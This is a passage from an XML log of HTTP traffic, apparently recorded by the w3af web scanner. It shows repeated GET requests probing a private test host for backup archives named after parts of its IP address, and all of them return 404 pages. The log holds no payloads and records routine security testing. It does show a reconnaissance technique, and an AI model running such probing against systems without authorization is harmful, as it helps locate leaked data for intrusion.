                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="211">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="212">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
